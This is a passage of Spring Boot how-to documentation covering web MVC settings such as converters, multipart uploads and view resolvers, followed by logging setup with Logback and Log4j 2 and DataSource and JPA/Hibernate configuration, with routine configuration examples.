Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. 
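As a sketch, the following settings (all values purely illustrative) override those
defaults:

[source,properties,indent=0]
----
	spring.servlet.multipart.max-file-size=10MB
	spring.servlet.multipart.max-request-size=100MB
	spring.servlet.multipart.location=/tmp
	spring.servlet.multipart.file-size-threshold=2KB
----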

If, for example, you want to specify that
files be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.

The multipart support is helpful when you want to receive multipart encoded file data as
a `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller
handler method.

See the
{sc-spring-boot-autoconfigure}/web/servlet/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]
source for more details.

NOTE: It is recommended to use the container's built-in support for multipart uploads
rather than introducing an additional dependency such as Apache Commons File Upload.



[[howto-switch-off-the-spring-mvc-dispatcherservlet]]
=== Switch Off the Spring MVC DispatcherServlet
By default, all content is served from the root of your application (`/`). If you
would rather map to a different path, you can configure one as follows:

[source,properties,indent=0,subs="verbatim"]
----
	spring.mvc.servlet.path=/acme
----

If you have additional servlets, you can declare a `@Bean` of type `Servlet` or
`ServletRegistrationBean` for each, and Spring Boot registers them transparently with the
container. Because servlets are registered that way, they can be mapped to a sub-context
of the `DispatcherServlet` without invoking it.

Configuring the `DispatcherServlet` yourself is unusual, but if you really need to do it, a
`@Bean` of type `DispatcherServletPath` must also be provided to set the path of
your custom `DispatcherServlet`.



[[howto-switch-off-default-mvc-configuration]]
=== Switch Off the Default MVC Configuration
The easiest way to take complete control over MVC configuration is to provide your own
`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC
configuration in your hands.



[[howto-customize-view-resolvers]]
=== Customize ViewResolvers
A `ViewResolver` is a core component of Spring MVC, translating view names in
`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly
used in UI applications, rather than REST-style services (a `View` is not used to render
a `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and
Spring on its own is not opinionated about which ones you should use. Spring Boot, on the
other hand, installs one or two for you, depending on what it finds on the classpath and
in the application context. The `DispatcherServlet` uses all the resolvers it finds in
the application context, trying each one in turn until it gets a result, so, if you
add your own, you have to be aware of the order and of the position at which your
resolver is added.

`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:

* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates
physical resources that can be rendered by using the `DefaultServlet` (including static
resources and JSP pages, if you use those). It applies a prefix and a suffix to the
view name and then looks for a physical resource with that path in the servlet context
(the defaults are both empty but are accessible for external configuration through
`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by
providing a bean of the same type.
* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the
view resolver chain and picks up any beans with the same name as the `View` being
resolved.
It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. 
You can override `GroovyMarkupViewResolver` by providing a bean of the
same name.

For more detail, see the following sections:

* {sc-spring-boot-autoconfigure}/web/servlet/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/freemarker/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/groovy/template/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]



[[howto-use-test-with-spring-security]]
== Testing With Spring Security
Spring Security provides support for running tests as a specific user.
For example, the test in the snippet below runs with an authenticated user
that has the `ADMIN` role.

[source,java,indent=0]
----
	@Test
	@WithMockUser(roles="ADMIN")
	public void requestProtectedUrlWithUser() throws Exception {
		mvc
			.perform(get("/"))
			...
	}
----

Spring Security provides comprehensive integration with Spring MVC Test, and
this can also be used when testing controllers by using the `@WebMvcTest` slice and `MockMvc`.

For additional details on Spring Security's testing support, refer to Spring Security's
https://docs.spring.io/spring-security/site/docs/current/reference/htmlsingle/#test[reference documentation].



[[howto-jersey]]
== Jersey



[[howto-jersey-spring-security]]
=== Secure Jersey Endpoints with Spring Security
Spring Security can be used to secure a Jersey-based web application in much the same
way as it can be used to secure a Spring MVC-based web application. However, if you want
to use Spring Security's method-level security with Jersey, you must configure Jersey to
use `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing the
response before Spring Security has had an opportunity to report an authentication or
authorization failure to the client.

The `jersey.config.server.response.setStatusOverSendError` property must be set to `true`
on the application's `ResourceConfig` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jersey/JerseySetStatusOverSendErrorExample.java[tag=resource-config]
----



[[howto-http-clients]]
== HTTP Clients

Spring Boot offers a number of starters that work with HTTP clients. This section answers
questions related to using them.

[[howto-http-clients-proxy-configuration]]
=== Configure RestTemplate to Use a Proxy
As described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,
you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized
`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured
to use a proxy.

The exact details of the proxy configuration depend on the underlying client request
factory that is being used. The following example configures
`HttpComponentsClientHttpRequestFactory` with an `HttpClient` that uses a proxy for all
hosts except `192.168.0.5`:

[source,java,indent=0]
----
include::{code-examples}/web/client/RestTemplateProxyCustomizationExample.java[tag=customizer]
----



[[howto-logging]]
== Logging

Spring Boot has no mandatory logging dependency, except for the Commons Logging API, which
is typically provided by Spring Framework's `spring-jcl` module.
To use\nhttp:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `${PID}`: The current process ID.\n* `${LOG_FILE}`: Whether `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}`: Whether `logging.path` (representing a directory for\n log files to live in) was set in Boot's external configuration.\n* `${LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set\n in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. 
If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). 
See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. 
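For illustration, a minimal builder-based definition (reusing the `app.datasource`
prefix from the examples in this section) might look like the following sketch:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	@ConfigurationProperties(prefix = "app.datasource")
	public DataSource dataSource() {
		// the pool implementation is detected from the classpath and the
		// driver is deduced from the JDBC URL
		return DataSourceBuilder.create().build();
	}
----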

Check the implementation that
is going to be used at runtime for more details.

The following example shows how to define a JDBC data source by setting properties:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.pool-size=30
----

However, there is a catch. Because the actual type of the connection pool is not exposed,
no keys are generated in the metadata for your custom `DataSource` and no completion is
available in your IDE (because the `DataSource` interface exposes no properties). Also, if
you happen to have Hikari on the classpath, this basic setup does not work, because Hikari
has no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite
your configuration as follows:

[source,properties,indent=0]
----
	app.datasource.jdbc-url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.maximum-pool-size=30
----

You can fix that by forcing the connection pool to use and return a dedicated
implementation rather than `DataSource`. You cannot change the implementation
at runtime, but the list of options will be explicit.

The following example shows how to create a `HikariDataSource` with `DataSourceBuilder`:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/SimpleDataSourceExample.java[tag=configuration]
----

You can even go further by leveraging what `DataSourceProperties` does for you -- that is,
by providing a default embedded database with a sensible username and password if no URL
is provided. You can easily initialize a `DataSourceBuilder` from the state of any
`DataSourceProperties` object, so you could also inject the `DataSource` that Spring Boot
creates automatically. However, that would split your configuration into two namespaces:
`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on
your custom namespace (`app.datasource`). To avoid that, you can redefine a custom
`DataSourceProperties` on your custom namespace, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/ConfigurableDataSourceExample.java[tag=configuration]
----

This setup puts you _in sync_ with what Spring Boot does for you by default, except that
a dedicated connection pool is chosen (in code) and its settings are exposed in the
`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking
care of the `url`/`jdbcUrl` translation for you, you can configure it as follows:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.configuration.maximum-pool-size=30
----

TIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This
example uses a more generic `configuration` sub namespace, as the example does not support
multiple data source implementations.

NOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`
has no effect.
In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. 
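To get more control, use the `@EnableJpaRepositories` annotation (from Spring Data JPA),
as shown in the following sketch, where `CityRepository` is a hypothetical repository
interface in the package you want to scan:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Configuration
	@EnableAutoConfiguration
	@EnableJpaRepositories(basePackageClasses = CityRepository.class)
	public class Application {

		//...

	}
----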

For more about Spring Data, see the {spring-data}[Spring Data project page].



[[howto-separate-entity-definitions-from-spring-configuration]]
=== Separate @Entity Definitions from Spring Configuration
Spring Boot tries to guess the location of your `@Entity` definitions, based on the
`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`
annotation, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Configuration
	@EnableAutoConfiguration
	@EntityScan(basePackageClasses=City.class)
	public class Application {

		//...

	}
----



[[howto-configure-jpa-properties]]
=== Configure JPA Properties
Spring Data JPA already provides some vendor-independent configuration options (such as
those for SQL logging), and Spring Boot exposes those options and a few more for Hibernate
as external configuration properties. Some of them are automatically detected according to
the context, so you should not have to set them.

The `spring.jpa.hibernate.ddl-auto` property is a special case, because, depending on
runtime conditions, it has different defaults. If an embedded database is used and no
schema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to
`create-drop`. In all other cases, it defaults to `none`.

The dialect to use is also automatically detected based on the current `DataSource`, but
you can set `spring.jpa.database` yourself if you want to be explicit and bypass that
check on startup.

NOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate
dialect. Several databases have more than one `Dialect`, and this may not suit your needs.
In that case, you can either set `spring.jpa.database` to `default` to let Hibernate
figure things out or set the dialect by setting the `spring.jpa.database-platform`
property.

The most common options to set are shown in the following example:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy
	spring.jpa.show-sql=true
----

In addition, all properties in `+spring.jpa.properties.*+` are passed through as normal
JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is
created.

TIP: If you need to apply advanced customization to Hibernate properties, consider
registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating
the `EntityManagerFactory`. This takes precedence over anything that is applied by the
auto-configuration.
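A minimal sketch of such a customizer follows (the `hibernate.format_sql` setting is
purely illustrative; any native Hibernate property can be set this way):

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public HibernatePropertiesCustomizer hibernatePropertiesCustomizer() {
		// illustrative only: ask Hibernate to pretty-print the SQL it logs
		return (hibernateProperties) -> hibernateProperties.put("hibernate.format_sql", "true");
	}
----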


[[howto-configure-hibernate-naming-strategy]]
=== Configure Hibernate Naming Strategy
Hibernate uses {hibernate-documentation}#naming[two different naming strategies] to map
names from the object model to the corresponding database names. The fully qualified
class name of the physical and the implicit strategy implementations can be configured by
setting the `spring.jpa.hibernate.naming.physical-strategy` and
`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,
if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the
application context, Hibernate will be automatically configured to use them.

By default, Spring Boot configures the physical naming strategy with
`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as
Hibernate 4: all dots are replaced by underscores and camel casing is replaced by
underscores as well. By default, all table names are generated in lower case, but it is
possible to override that flag if your schema requires it.

For example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.

If you prefer to use Hibernate 5's default instead, set the following property:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl
----

Alternatively, you can configure the following bean:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public PhysicalNamingStrategy physicalNamingStrategy() {
		return new PhysicalNamingStrategyStandardImpl();
	}
----

See {sc-spring-boot-autoconfigure}/orm/jpa/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]
and {sc-spring-boot-autoconfigure}/orm/jpa/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]
for more details.



[[howto-configure-hibernate-second-level-caching]]
=== Configure Hibernate Second-Level Caching
Hibernate {hibernate-documentation}#caching[second-level cache] can be configured for a
range of cache providers. Rather than configuring Hibernate to look up the cache provider
again, it is better to provide the one that is available in the context whenever possible.

If you are using JCache, this is straightforward. First, make sure that
`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a
`HibernatePropertiesCustomizer` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jpa/HibernateSecondLevelCacheExample.java[tag=configuration]
----

This customizer configures Hibernate to use the same `CacheManager` as the one that
the application uses. It is also possible to use separate `CacheManager` instances. For
details, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user
guide].



[[howto-use-dependency-injection-hibernate-components]]
=== Use Dependency Injection in Hibernate Components
By default, Spring Boot registers a `BeanContainer` implementation that uses the
`BeanFactory` so that converters and entity listeners can use regular dependency
injection.

You can disable or tune this behavior by registering a `HibernatePropertiesCustomizer`
that removes or changes the `hibernate.resource.beans.container` property.



[[howto-use-custom-entity-manager]]
=== Use a Custom EntityManagerFactory
To take full control of the configuration of the `EntityManagerFactory`, you need to add
a `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its
entity manager in the presence of a bean of that type.



[[howto-use-two-entity-managers]]
=== Use Two EntityManagers
Even if the default `EntityManagerFactory` works fine, you need to define a new one,
because, otherwise, the presence of a second bean of that type switches off the
default. To make this easy, you can use the convenient `EntityManagerFactoryBuilder`
provided by Spring Boot.
Alternatively, you can use the
`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	// add two data sources configured as above

	@Bean
	public LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(
			EntityManagerFactoryBuilder builder) {
		return builder
				.dataSource(customerDataSource())
				.packages(Customer.class)
				.persistenceUnit("customers")
				.build();
	}

	@Bean
	public LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(
			EntityManagerFactoryBuilder builder) {
		return builder
				.dataSource(orderDataSource())
				.packages(Order.class)
				.persistenceUnit("orders")
				.build();
	}
----

The configuration above almost works on its own. To complete the picture, you need to
configure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of
them as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring
